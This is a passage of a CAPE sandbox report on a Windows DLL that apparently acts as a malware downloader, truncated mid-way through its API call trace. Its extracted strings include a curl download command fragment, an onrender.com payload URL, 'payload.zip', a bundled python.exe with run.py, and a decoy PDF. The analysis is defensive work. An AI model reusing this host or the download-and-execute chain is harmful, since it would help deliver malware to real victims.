Work\\Duy\\PyApp\\workplace\\curl\\Dll1\\Release\\Dll1.pdb","imports":{"KERNEL32":{"dll":"KERNEL32.dll","imports":[{"address":"0x10008000","name":"CreateDirectoryW"},{"address":"0x10008004","name":"WriteFile"},{"address":"0x10008008","name":"TerminateProcess"},{"address":"0x1000800c","name":"GetModuleFileNameW"},{"address":"0x10008010","name":"WaitForSingleObject"},{"address":"0x10008014","name":"CreateFileW"},{"address":"0x10008018","name":"GetFileAttributesW"},{"address":"0x1000801c","name":"Sleep"},{"address":"0x10008020","name":"CloseHandle"},{"address":"0x10008024","name":"CreateProcessW"},{"address":"0x10008028","name":"GetExitCodeProcess"},{"address":"0x1000802c","name":"UnhandledExceptionFilter"},{"address":"0x10008030","name":"IsDebuggerPresent"},{"address":"0x10008034","name":"InitializeSListHead"},{"address":"0x10008038","name":"GetSystemTimeAsFileTime"},{"address":"0x1000803c","name":"GetCurrentThreadId"},{"address":"0x10008040","name":"GetCurrentProcessId"},{"address":"0x10008044","name":"QueryPerformanceCounter"},{"address":"0x10008048","name":"GetCurrentProcess"},{"address":"0x1000804c","name":"SetUnhandledExceptionFilter"},{"address":"0x10008050","name":"IsProcessorFeaturePresent"}]},"SHELL32":{"dll":"SHELL32.dll","imports":[{"address":"0x10008104","name":"SHFileOperationW"},{"address":"0x10008108","name":"ShellExecuteExW"}]},"ole32":{"dll":"ole32.dll","imports":[{"address":"0x100081f8","name":"CoCreateInstance"},{"address":"0x100081fc","name":"CoInitialize"},{"address":"0x10008200","name":"CoUninitialize"}]},"OLEAUT32":{"dll":"OLEAUT32.dll","imports":[{"address":"0x100080f0","name":"VariantInit"},{"address":"0x100080f4","name":"SysFreeString"},{"address":"0x100080f8","name":"SysAllocString"},{"address":"0x100080fc","name":"VariantClear"}]},"MSVCP140":{"dll":"MSVCP140.dll","imports":[{"address":"0x10008058","name":"??1_Lockit@std@@QAE@XZ"},{"address":"0x1000805c","name":"??0_Lockit@std@@QAE@H@Z"},{"address":"0x10008060","name":"?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ"},{"address":"0x10008064","name":"?_Id_cnt@id@locale@std@@0HA"},{"address":"0x10008068","name":"?_Xout_of_range@std@@YAXPBD@Z"},{"address":"0x1000806c","name":"?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A"},{"address":"0x10008070","name":"?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z"},{"address":"0x10008074","name":"?_Xlength_error@std@@YAXPBD@Z"},{"address":"0x10008078","name":"?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ"},{"address":"0x1000807c","name":"??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ"},{"address":"0x10008080","name":"?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ"},{"address":"0x10008084","name":"?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001@Z"},{"address":"0x10008088","name":"??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z"},{"address":"0x1000808c","name":"?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD@Z"},{"address":"0x10008090","name":"?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z"},{"address":"0x10008094","name":"?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z"},{"address":"0x10008098","name":"??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ"},{"address":"0x1000809c","name":"??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z"},{"address":"0x100080a0","name":"?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z"},{"address":"0x100080a4","name":"?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z"},{"address":"0x100080a8","name":"??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ"},{"address":"0x100080ac","name":"??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ"},{"address":"0x100080b0","name":"?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ"},{"address":"0x100080b4","name":"?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ"},{"address":"0x100080b8","name":"?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ"},{"address":"0x100080bc","name":"?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ"},{"address":"0x100080c0","name":"?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z"},{"address":"0x100080c4","name":"?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z"},{"address":"0x100080c8","name":"?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEPAV12@PAD_J@Z"},{"address":"0x100080cc","name":"?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ"},{"address":"0x100080d0","name":"?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEXABVlocale@2@@Z"},{"address":"0x100080d4","name":"??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ"},{"address":"0x100080d8","name":"??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z"},{"address":"0x100080dc","name":"??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ"},{"address":"0x100080e0","name":"??7ios_base@std@@QBE_NXZ"},{"address":"0x100080e4","name":"?always_noconv@codecvt_base@std@@QBE_NXZ"},{"address":"0x100080e8","name":"?_Xbad_alloc@std@@YAXXZ"}]},"WINHTTP":{"dll":"WINHTTP.dll","imports":[{"address":"0x1000813c","name":"WinHttpQueryDataAvailable"},{"address":"0x10008140","name":"WinHttpReceiveResponse"},{"address":"0x10008144","name":"WinHttpConnect"},{"address":"0x10008148","name":"WinHttpSendRequest"},{"address":"0x1000814c","name":"WinHttpOpen"},{"address":"0x10008150","name":"WinHttpCloseHandle"},{"address":"0x10008154","name":"WinHttpReadData"},{"address":"0x10008158","name":"WinHttpOpenRequest"}]},"VCRUNTIME140":{"dll":"VCRUNTIME140.dll","imports":[{"address":"0x10008110","name":"memmove"},{"address":"0x10008114","name":"__CxxFrameHandler3"},{"address":"0x10008118","name":"__std_exception_destroy"},{"address":"0x1000811c","name":"__std_exception_copy"},{"address":"0x10008120","name":"__std_terminate"},{"address":"0x10008124","name":"memcpy"},{"address":"0x10008128","name":"memset"},{"address":"0x1000812c","name":"_CxxThrowException"},{"address":"0x10008130","name":"__std_type_info_destroy_list"},{"address":"0x10008134","name":"_except_handler4_common"}]},"api-ms-win-crt-stdio-l1-1-0":{"dll":"api-ms-win-crt-stdio-l1-1-0.dll","imports":[{"address":"0x100081b8","name":"fputc"},{"address":"0x100081bc","name":"_fseeki64"},{"address":"0x100081c0","name":"_get_stream_buffer_pointers"},{"address":"0x100081c4","name":"fread"},{"address":"0x100081c8","name":"fflush"},{"address":"0x100081cc","name":"fclose"},{"address":"0x100081d0","name":"ungetc"},{"address":"0x100081d4","name":"fgetc"},{"address":"0x100081d8","name":"setvbuf"},{"address":"0x100081dc","name":"fgetpos"},{"address":"0x100081e0","name":"fwrite"},{"address":"0x100081e4","name":"fsetpos"}]},"api-ms-win-crt-runtime-l1-1-0":{"dll":"api-ms-win-crt-runtime-l1-1-0.dll","imports":[{"address":"0x10008188","name":"_cexit"},{"address":"0x1000818c","name":"_invoke_watson"},{"address":"0x10008190","name":"_initterm"},{"address":"0x10008194","name":"_initterm_e"},{"address":"0x10008198","name":"_seh_filter_dll"},{"address":"0x1000819c","name":"_configure_narrow_argv"},{"address":"0x100081a0","name":"_initialize_narrow_environment"},{"address":"0x100081a4","name":"_initialize_onexit_table"},{"address":"0x100081a8","name":"_register_onexit_function"},{"address":"0x100081ac","name":"_execute_onexit_table"},{"address":"0x100081b0","name":"_crt_atexit"}]},"api-ms-win-crt-filesystem-l1-1-0":{"dll":"api-ms-win-crt-filesystem-l1-1-0.dll","imports":[{"address":"0x10008168","name":"_lock_file"},{"address":"0x1000816c","name":"_wstat64i32"},{"address":"0x10008170","name":"_unlock_file"}]},"api-ms-win-crt-convert-l1-1-0":{"dll":"api-ms-win-crt-convert-l1-1-0.dll","imports":[{"address":"0x10008160","name":"strtol"}]},"api-ms-win-crt-string-l1-1-0":{"dll":"api-ms-win-crt-string-l1-1-0.dll","imports":[{"address":"0x100081ec","name":"isspace"},{"address":"0x100081f0","name":"_stricmp"}]},"api-ms-win-crt-heap-l1-1-0":{"dll":"api-ms-win-crt-heap-l1-1-0.dll","imports":[{"address":"0x10008178","name":"_callnewh"},{"address":"0x1000817c","name":"malloc"},{"address":"0x10008180","name":"free"}]}},"exported_dll_name":"Dll1.dll","exports":[{"address":"0x10002580","name":"ax","ordinal":1}],"dirents":[{"name":"IMAGE_DIRECTORY_ENTRY_EXPORT","virtual_address":"0x0000b890","size":"0x00000040"},{"name":"IMAGE_DIRECTORY_ENTRY_IMPORT","virtual_address":"0x0000b8d0","size":"0x00000118"},{"name":"IMAGE_DIRECTORY_ENTRY_RESOURCE","virtual_address":"0x0000e000","size":"0x000000f8"},{"name":"IMAGE_DIRECTORY_ENTRY_EXCEPTION","virtual_address":"0x00000000","size":"0x00000000"},{"name":"IMAGE_DIRECTORY_ENTRY_SECURITY","virtual_address":"0x00000000","size":"0x00000000"},{"name":"IMAGE_DIRECTORY_ENTRY_BASERELOC","virtual_address":"0x0000f000","size":"0x0000060c"},{"name":"IMAGE_DIRECTORY_ENTRY_DEBUG","virtual_address":"0x0000abd8","size":"0x00000070"},{"name":"IMAGE_DIRECTORY_ENTRY_COPYRIGHT","virtual_address":"0x00000000","size":"0x00000000"},{"name":"IMAGE_DIRECTORY_ENTRY_GLOBALPTR","virtual_address":"0x00000000","size":"0x00000000"},{"name":"IMAGE_DIRECTORY_ENTRY_TLS","virtual_address":"0x00000000","size":"0x00000000"},{"name":"IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG","virtual_address":"0x0000ab18","size":"0x00000040"},{"name":"IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT","virtual_address":"0x00000000","size":"0x00000000"},{"name":"IMAGE_DIRECTORY_ENTRY_IAT","virtual_address":"0x00008000","size":"0x00000208"},{"name":"IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT","virtual_address":"0x00000000","size":"0x00000000"},{"name":"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR","virtual_address":"0x00000000","size":"0x00000000"},{"name":"IMAGE_DIRECTORY_ENTRY_RESERVED","virtual_address":"0x00000000","size":"0x00000000"}],"sections":[{"name":".text","raw_address":"0x00000400","virtual_address":"0x00001000","virtual_size":"0x00006c92","size_of_data":"0x00006e00","characteristics":"IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ","characteristics_raw":"0x60000020","entropy":"6.39"},{"name":".rdata","raw_address":"0x00007200","virtual_address":"0x00008000","virtual_size":"0x00004b34","size_of_data":"0x00004c00","characteristics":"IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ","characteristics_raw":"0x40000040","entropy":"5.28"},{"name":".data","raw_address":"0x0000be00","virtual_address":"0x0000d000","virtual_size":"0x00000730","size_of_data":"0x00000400","characteristics":"IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE","characteristics_raw":"0xc0000040","entropy":"4.04"},{"name":".rsrc","raw_address":"0x0000c200","virtual_address":"0x0000e000","virtual_size":"0x000000f8","size_of_data":"0x00000200","characteristics":"IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ","characteristics_raw":"0x40000040","entropy":"2.51"},{"name":".reloc","raw_address":"0x0000c400","virtual_address":"0x0000f000","virtual_size":"0x0000060c","size_of_data":"0x00000800","characteristics":"IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ","characteristics_raw":"0x42000040","entropy":"5.59"}],"overlay":null,"resources":[{"name":"RT_MANIFEST","offset":"0x0000e060","size":"0x00000091","filetype":null,"language":"LANG_ENGLISH","sublanguage":"SUBLANG_ENGLISH_US","entropy":"4.89"}],"versioninfo":[],"imphash":"e44ab922d75327a3c67ce12ffb001154","timestamp":"2025-11-08 09:48:44","icon":null,"icon_hash":null,"icon_fuzzy":null,"icon_dhash":null,"imported_dll_count":13},"data":null,"strings":[".?AVexception@std@@",".?AVtype_info@@",".?AV?$basic_istream@DU?$char_traits@D@std@@@std@@",".rdata$voltmd","__std_exception_destroy",".?AVios_base@std@@","IsProcessorFeaturePresent",")D$ 3","?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEPAV12@PAD_J@Z","_get_stream_buffer_pointers","_cexit",":/:A:L:o:","?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEXABVlocale@2@@Z","8(80888@8T8\\8d8l8","5i5|5","bad cast","SHFileOperationW","9,989^9","Sleep","9Y:l:","?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ",".?AVbad_alloc@std@@","??0_Lockit@std@@QAE@H@Z","fclose","api-ms-win-crt-filesystem-l1-1-0.dll","IsDebuggerPresent",".?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@",".CRT$XTA","0H1T1`1x1",".text$yd","vector too long","isspace","D$`j8j",".CRT$XIZ","bad allocation","_configure_narrow_argv","8F8O8W8G9':","_fseeki64",".text$x","SetUnhandledExceptionFilter","?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z","InitializeSListHead","WinHttpReadData","?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ",".CRT$XCL","ungetc","7L8k8q8y8","?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ","??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ","9=;{<","WINHTTP.dll","6 6(60686@6L6l6x6","UnhandledExceptionFilter","pdf.pdf","??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ","WinHttpReceiveResponse","??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ",".?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@","?_Xbad_alloc@std@@YAXXZ","api-ms-win-crt-heap-l1-1-0.dll",".?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@","<?xml version='1.0' encoding='UTF-8' standalone='yes'?>","3}496","run.py","CreateProcessW","?always_noconv@codecvt_base@std@@QBE_NXZ",".?AV?$basic_ios@DU?$char_traits@D@std@@@std@@","5#5*5=5K5Q5W5]5c5i5p5w5~5","memset","??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z","6>6D6X6","VCRUNTIME140.dll",".rdata$r","?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z","80959L9V9\\9b9h9n9t9z9","GetCurrentProcessId","7\"7E7X7$8=8G8a8m8r8","?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001@Z","O _^[","\" -o \"","QueryPerformanceCounter","output.txt","__std_terminate","?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z","_CxxThrowException","u,PPPPP","?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z",".rsrc$02",".CRT$XPZ","SHELL32.dll","??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ","?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z","WinHttpOpenRequest",".rdata$zzzdbg","GetCurrentProcess","invalid string position","?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z",".rtc$IAA","fread","5Genu","WriteFile","?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ",">K>|>","setvbuf",";T;X;`;",".rtc$TZZ","_execute_onexit_table",">7?W?o?","??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ","jjjjjj","_invoke_watson","@.data","?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z","OLEAUT32.dll","api-ms-win-crt-string-l1-1-0.dll",".?AVbad_array_new_length@std@@",".data$r",".CRT$XPA","WinHttpConnect","0(0,0D0T0X0h0l0p0","GetCurrentThreadId",".text",".rdata",".CRT$XIA","Dll1.dll",".CRT$XCA","CreateFileW","5ntel","?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ","5J6Z6f6t6","> >4>8><>D>L>P>T>X>l>p>","payload.zip","WinHttpOpen",".rdata$sxdata","_initialize_narrow_environment",".CRT$XCZ",".idata$5","ole32.dll","=D>a>i>5?","O8_^[","WinHttpQueryDataAvailable","WinHttpCloseHandle","fwrite","_register_onexit_function","q2Richz","<3<8<E<","GetModuleFileNameW","1>1v1","4#4-4","_initterm","0\"3*3","Downloader/1.0","\\zip\\python.exe","_unlock_file",".edata",".idata$6","fflush","fgetc","??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z",".?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@","MSVCP140.dll","??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z","5T6~6","?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD@Z","strtol","KERNEL32.dll","memcpy","?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ","?D?q?","3/3O3`3i3",".00cfg","8 8$8P:T:X:\\:`:d:h:l:p:t:x:|:","Unknown exception","000D0[0b0",".?AV?$_Iosb@H@std@@",".rtc$IZZ","_initialize_onexit_table","__std_exception_copy","https","RQPRQP","_stricmp","_callnewh","_except_handler4_common","??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ","CoUninitialize","malloc","<:<g<",".CRT$XTZ","GetFileAttributesW","__std_type_info_destroy_list","WaitForSingleObject",".idata$2","api-ms-win-crt-stdio-l1-1-0.dll","string too long","??1_Lockit@std@@QAE@XZ",".?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@","364E4`4t4y4","3'4B4K4Q4!5+5Y5d5","1@2\\2",";,=9>G>Z>`>","C:\\Users\\lengo\\Desktop\\Spamming Work\\Duy\\PyApp\\workplace\\curl\\Dll1\\Release\\Dll1.pdb","ycurl.exe -L -s -A \"curl\" \"","\\zip\\","GD$ P","fputc","https://githostaduviep-g550.onrender.com","?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A","/output.txt","CoInitialize","5&5f5u5","<8<E<","ShellExecuteExW",".text$mn","@.reloc","api-ms-win-crt-runtime-l1-1-0.dll","?_Xlength_error@std@@YAXPBD@Z","w\"VPS","fgetpos","__CxxFrameHandler3","1-131=1C1L1R1Z1_1s1x1","7$7,747P7p7|7","CoCreateInstance","?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ",".?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@","2,3d3","/pdf.pdf","=!>'>1>7>","?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ","memmove",".idata$3",".idata$4","343g3","? ?8?<?@?D?H?L?P?T?X?\\?p?","_seh_filter_dll","1 181<1@1D1H1L1`1d1|1","jjjjj","-030<0E0N0T0Z0o0x0","api-ms-win-crt-convert-l1-1-0.dll","u&PPPPP","TerminateProcess",".rsrc","j$X9E","GetSystemTimeAsFileTime","!This program cannot be run in DOS mode.","</assembly>","6>6[6","fsetpos",".rtc$TAA",".data$rs","GetExitCodeProcess","CloseHandle","??7ios_base@std@@QBE_NXZ",".text$di","2>2d2",".rsrc$01","_wstat64i32","`.rdata","CreateDirectoryW",".?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@","u(PPPPP",".?AVbad_cast@std@@","1(1x1","<<=L=",".data","_initterm_e","WinHttpSendRequest","<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>","=$=(=@=P=T=X=`=d=l=","?_Xout_of_range@std@@YAXPBD@Z",":&:;:\\:n:",":7;T;","mysecretkey","bad array new length","_lock_file",".xdata$x","_crt_atexit","?_Id_cnt@id@locale@std@@0HA","u'PPPPP"],"virustotal":{"error":true,"msg":"Unable to complete connection to VirusTotal. Status code: 429"},"cape_type_code":0,"cape_type":""}},"CAPE":{"payloads":[],"configs":[]},"info":{"version":"2.4-CAPE","started":"2025-11-15 08:47:33","ended":"2025-11-15 08:52:15","duration":282,"id":10,"category":"file","custom":"","machine":{"id":10,"status":"stopping","name":"win10","label":"win10","platform":"windows","manager":"KVM","started_on":"2025-11-15 08:47:33","shutdown_on":"2025-11-15 08:52:07"},"package":"dll","timeout":true,"tlp":null,"parent_sample":null,"options":{},"source_url":null,"route":"none","user_id":0,"CAPE_current_commit":"9cf8bf5a0ee601c0afc7068413c59a1049674c64"},"behavior":{"processes":[{"process_id":1052,"process_name":"rundll32.exe","parent_id":7528,"module_path":"C:\\Windows\\SysWOW64\\rundll32.exe","first_seen":"2025-11-15 16:47:15,873","calls":[{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x76065c5a","parentcaller":"0x76b44cce","category":"process","api":"NtProtectVirtualMemory","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x76b55000"},{"name":"ModuleName","value":"imagehlp.dll"},{"name":"NumberOfBytesProtected","value":"0x00002000"},{"name":"MemoryType","value":"0x00000000"},{"name":"NewAccessProtection","value":"0x00000004","pretty_value":"PAGE_READWRITE"},{"name":"OldAccessProtection","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":0},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x7604fbba","parentcaller":"0x76b44c2c","category":"system","api":"LdrGetProcedureAddressForCaller","status":true,"return":"0x00000000","arguments":[{"name":"ModuleName","value":"KERNEL32.DLL"},{"name":"ModuleHandle","value":"0x76330000"},{"name":"FunctionName","value":"GetThreadContext"},{"name":"Ordinal","value":"0"},{"name":"FunctionAddress","value":"0x76364c50"}],"repeated":0,"id":1},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x7604fbba","parentcaller":"0x76b44c2c","category":"system","api":"LdrGetProcedureAddressForCaller","status":true,"return":"0x00000000","arguments":[{"name":"ModuleName","value":"KERNEL32.DLL"},{"name":"ModuleHandle","value":"0x76330000"},{"name":"FunctionName","value":"GetThreadTimes"},{"name":"Ordinal","value":"0"},{"name":"FunctionAddress","value":"0x76352610"}],"repeated":0,"id":2},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x7604fbba","parentcaller":"0x76b44c2c","category":"system","api":"LdrGetProcedureAddressForCaller","status":true,"return":"0x00000000","arguments":[{"name":"ModuleName","value":"KERNEL32.DLL"},{"name":"ModuleHandle","value":"0x76330000"},{"name":"FunctionName","value":"IsProcessorFeaturePresent"},{"name":"Ordinal","value":"0"},{"name":"FunctionAddress","value":"0x76351210"}],"repeated":0,"id":3},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x7604fbba","parentcaller":"0x76b44c2c","category":"system","api":"LdrGetProcedureAddressForCaller","status":true,"return":"0x00000000","arguments":[{"name":"ModuleName","value":"KERNEL32.DLL"},{"name":"ModuleHandle","value":"0x76330000"},{"name":"FunctionName","value":"OpenThread"},{"name":"Ordinal","value":"0"},{"name":"FunctionAddress","value":"0x7634fbe0"}],"repeated":0,"id":4},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x7604fbba","parentcaller":"0x76b44c2c","category":"system","api":"LdrGetProcedureAddressForCaller","status":true,"return":"0x00000000","arguments":[{"name":"ModuleName","value":"KERNEL32.DLL"},{"name":"ModuleHandle","value":"0x76330000"},{"name":"FunctionName","value":"ProcessIdToSessionId"},{"name":"Ordinal","value":"0"},{"name":"FunctionAddress","value":"0x76351230"}],"repeated":0,"id":5},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x7604fbba","parentcaller":"0x76b44c2c","category":"system","api":"LdrGetProcedureAddressForCaller","status":true,"return":"0x00000000","arguments":[{"name":"ModuleName","value":"KERNEL32.DLL"},{"name":"ModuleHandle","value":"0x76330000"},{"name":"FunctionName","value":"SetProcessShutdownParameters"},{"name":"Ordinal","value":"0"},{"name":"FunctionAddress","value":"0x76349540"}],"repeated":0,"id":6},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x7604fbba","parentcaller":"0x76b44c2c","category":"system","api":"LdrGetProcedureAddressForCaller","status":true,"return":"0x00000000","arguments":[{"name":"ModuleName","value":"KERNEL32.DLL"},{"name":"ModuleHandle","value":"0x76330000"},{"name":"FunctionName","value":"SetThreadContext"},{"name":"Ordinal","value":"0"},{"name":"FunctionAddress","value":"0x763660a0"}],"repeated":0,"id":7},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x7604fbba","parentcaller":"0x76b44c2c","category":"system","api":"LdrGetProcedureAddressForCaller","status":true,"return":"0x00000000","arguments":[{"name":"ModuleName","value":"KERNEL32.DLL"},{"name":"ModuleHandle","value":"0x76330000"},{"name":"FunctionName","value":"GetProcessId"},{"name":"Ordinal","value":"0"},{"name":"FunctionAddress","value":"0x763512c0"}],"repeated":0,"id":8},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x76065c5a","parentcaller":"0x76b44d2f","category":"process","api":"NtProtectVirtualMemory","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x76b55000"},{"name":"ModuleName","value":"imagehlp.dll"},{"name":"NumberOfBytesProtected","value":"0x00002000"},{"name":"MemoryType","value":"0x00000000"},{"name":"NewAccessProtection","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"OldAccessProtection","value":"0x00000004","pretty_value":"PAGE_READWRITE"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":9},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x76065c5a","parentcaller":"0x76b44cce","category":"process","api":"NtProtectVirtualMemory","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x76b55000"},{"name":"ModuleName","value":"imagehlp.dll"},{"name":"NumberOfBytesProtected","value":"0x00002000"},{"name":"MemoryType","value":"0x00000000"},{"name":"NewAccessProtection","value":"0x00000004","pretty_value":"PAGE_READWRITE"},{"name":"OldAccessProtection","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":10},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x76065c5a","parentcaller":"0x76b44d2f","category":"process","api":"NtProtectVirtualMemory","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x76b55000"},{"name":"ModuleName","value":"imagehlp.dll"},{"name":"NumberOfBytesProtected","value":"0x00002000"},{"name":"MemoryType","value":"0x00000000"},{"name":"NewAccessProtection","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"OldAccessProtection","value":"0x00000004","pretty_value":"PAGE_READWRITE"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":11},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x779f002d","parentcaller":"0x7604c93d","category":"system","api":"NtQueryLicenseValue","status":true,"return":"0x00000000","arguments":[{"name":"Name","value":"TerminalServices-RemoteConnectionManager-AllowAppServerMode"},{"name":"Type","value":"0x00000004"}],"repeated":0,"id":12},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x779f002d","parentcaller":"0x7604c93d","category":"system","api":"LdrpCallInitRoutine","status":true,"return":"0x00000001","arguments":[{"name":"MappedPath","value":"\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\imagehlp"},{"name":"BaseAddress","value":"0x76b40000"},{"name":"InitRoutine","value":"0x76b46560"},{"name":"Reason","value":"1"}],"repeated":0,"id":13},{"timestamp":"2025-11-15 16:47:16,263","thread_id":"3260","caller":"0x77a264c6","parentcaller":"0x77a263d1","category":"threading","api":"NtTestAlert","status":true,"return":"0x00000000","arguments":[],"repeated":1,"id":14},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"7476","caller":"0x77a11bae","parentcaller":"0x77a0db51","category":"system","api":"NtWaitForSingleObject","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x0000007c"},{"name":"Milliseconds","value":"18446744073709551615"},{"name":"Status","value":"Infinite"}],"repeated":2,"id":15},{"timestamp":"2025-11-15 